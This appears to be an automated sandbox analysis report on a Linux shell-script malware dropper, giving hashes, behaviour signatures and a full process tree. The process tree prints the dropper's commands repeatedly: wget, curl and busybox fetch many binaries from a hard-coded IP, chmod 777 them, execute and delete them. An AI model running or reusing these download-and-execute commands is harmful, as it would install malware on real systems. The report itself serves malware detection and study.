Analysis
-
max time kernel
41s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
14-11-2024 02:53
Static task
static1
Behavioral task
behavioral1
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
-
Size
10KB
-
MD5
920017685299c34fe40ed0d31390a654
-
SHA1
15be0738ab44434517b3a1bb41d0ba9752f0da28
-
SHA256
a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff
-
SHA512
345ccb820bce7b8dfc3acfa03f31c9b6f78085244b384f3120613434fc0e99ba7ff0dd572b530fb2ed261d9b8216390818d7773df018ccdd230cee2fa8b4a6a4
-
SSDEEP
192:wueun7kYb/vUMNghVWlhZHWaW2lVlwc4ueun7wb/vUMM8lVlwcKhZHWaP:wueun7kYb/vUMNghV92lVlwc4ueun7w4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
pid Process
1594 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
1595 rm
1658 wget
1659 curl
1660 busybox
1662 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt
1590 wget
1591 curl
1592 busybox
1663 rm
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh1⤵PID:1507
-
/bin/rm/bin/rm bins.sh2⤵PID:1508
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1509
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Writes file to tmp directory
PID:1513
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1514
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:1515
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:1516
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1517
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1518
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1520
-
-
/bin/chmodchmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Executes dropped EXE
PID:1522
-
-
/bin/rmrm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1523
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1524
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Writes file to tmp directory
PID:1525
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1526
-
-
/bin/chmodchmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Executes dropped EXE
PID:1528
-
-
/bin/rmrm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1529
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1530
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1532
-
-
/bin/chmodchmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Executes dropped EXE
PID:1534
-
-
/bin/rmrm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1535
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1536
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1538
-
-
/bin/chmodchmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1541
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1542
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1544
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:1546
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1547
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1550
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1553
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1554
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1556
-
-
/bin/chmodchmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1559
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1562
-
-
/bin/chmodchmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1565
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1568
-
-
/bin/chmodchmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1571
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1572
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1574
-
-
/bin/chmodchmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1577
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1578
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1580
-
-
/bin/chmodchmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1583
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1586
-
-
/bin/chmodchmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1589
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1590
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1592
-
-
/bin/chmodchmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1594
-
-
/bin/rmrm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1595
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1596
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1598
-
-
/bin/chmodchmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH2⤵PID:1601
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1604
-
-
/bin/chmodchmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD2⤵PID:1607
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1608
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1610
-
-
/bin/chmodchmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- File and Directory Permissions Modification
PID:1611
-
-
/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵
- Executes dropped EXE
PID:1612
-
-
/bin/rmrm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP2⤵PID:1613
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1614
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1616
-
-
/bin/chmodchmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵
- Executes dropped EXE
PID:1618
-
-
/bin/rmrm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw2⤵PID:1619
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1620
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Writes file to tmp directory
PID:1621
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1624
-
-
/bin/chmodchmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy2⤵PID:1627
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1630
-
-
/bin/chmodchmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz2⤵PID:1633
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1634
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1636
-
-
/bin/chmodchmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm42⤵PID:1639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1640
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1642
-
-
/bin/chmodchmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy9322⤵PID:1645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1648
-
-
/bin/chmodchmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs2⤵PID:1651
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1654
-
-
/bin/chmodchmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z2⤵PID:1657
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1658
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1659
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1660
-
-
/bin/chmodchmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- File and Directory Permissions Modification
PID:1661
-
-
/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1662
-
-
/bin/rmrm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt2⤵
- System Network Configuration Discovery
PID:1663
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1664
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Writes file to tmp directory
PID:1665
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1666
-
-
/bin/chmodchmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db2⤵PID:1669
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1670
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Writes file to tmp directory
PID:1671
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1672
-
-
/bin/chmodchmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- File and Directory Permissions Modification
PID:1673
-
-
/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵
- Executes dropped EXE
PID:1674
-
-
/bin/rmrm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq2⤵PID:1675
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1676
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Writes file to tmp directory
PID:1677
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1678
-
-
/bin/chmodchmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- File and Directory Permissions Modification
PID:1679
-
-
/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵
- Executes dropped EXE
PID:1680
-
-
/bin/rmrm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ2⤵PID:1681
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97